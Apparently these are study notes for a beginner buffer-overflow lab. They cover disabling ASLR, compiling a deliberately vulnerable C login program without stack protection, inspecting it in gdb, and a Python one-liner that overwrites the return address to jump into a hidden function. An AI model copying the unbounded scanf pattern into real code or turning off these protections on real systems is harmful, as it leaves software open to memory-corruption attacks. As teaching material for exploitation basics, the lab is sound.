sudo apt update
sudo apt install build-essential
sudo apt-get install gcc-multilib
sudo apt install gdb
cat /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space>
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
ulimit -c
ulimit -c unlimited
ulimit -c
*This code will be used for this exploit:
- vulnerable.c
#include <stdio.h>
#include <string.h>
void user(){
printf("Excellent Snake!\n");
printf("You have infiltrated the facility!!!\n");
}
void login(){
char password[16];
printf("Enter your password\n");
scanf("%s", password);
if(strcmp(password, "FoxHound")){
printf("Mission Failed!\n");
}
else{
user();
}
}
int main()
{
login();
return 0;
}
gcc -o vulnerable vulnerable.c
gcc -o vulnerable -fno-stack-protector -m32 -z execstack vulnerable.c
-fno-stack-protector --> Removes the canary value at the end of the buffer
-m32 --> Sets the program to compile into a 32 bit program
-z execstack --> Makes the stack executable
gdb ./vulnerable
-
Firstly disassemble main to know the function state of main in memory.
(gdb) disassemble main
-
Then disassemble login to know the function state of login in memory.
(gdb) disassemble login
-
Then disassemble user to know the function state of login in memory.
disassemble user
run
AAAAAAAA
- This will print incorrect password message. It works normally because it does not exceed the buffer limit.
disassemble login
break *0x080484ba break *0x080484e6
-
This created 2 break point in login function. This will be used to debug the program
-
To see information about registers i.e., $esp, $eip memory addresses, enfter following command:
info registers
run
AAAAAAAA
x/20x $esp
c
- This exits normally without any fault.
AAAAAAAAAAAAAAAAAAAAA
disassemble login
- then store address of user() function
(gdb) q or [ctrl+shift+z]
python -c "print('A'*28 + '\x8b\x84\x04\x08')" > input.txt
run < input.txt c c
- You will see "Mission Failed!" but gain access to the user function.
Thats all unless the 64-bit machine has some issues with GDB.